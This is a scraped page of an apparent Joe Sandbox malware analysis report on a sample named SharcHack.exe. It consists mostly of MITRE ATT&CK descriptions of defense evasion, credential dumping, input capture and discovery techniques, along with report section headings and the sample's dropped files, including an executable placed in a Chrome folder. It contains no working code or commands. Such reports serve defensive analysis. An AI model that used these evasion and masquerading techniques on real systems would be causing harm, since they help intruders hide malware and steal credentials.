Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SharcHack.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Program Files\Google\Libs\WR64.sys

C:\Program Files\Google\Libs\g.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\v2.exe.log

Windows Analysis Report
SharcHack.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre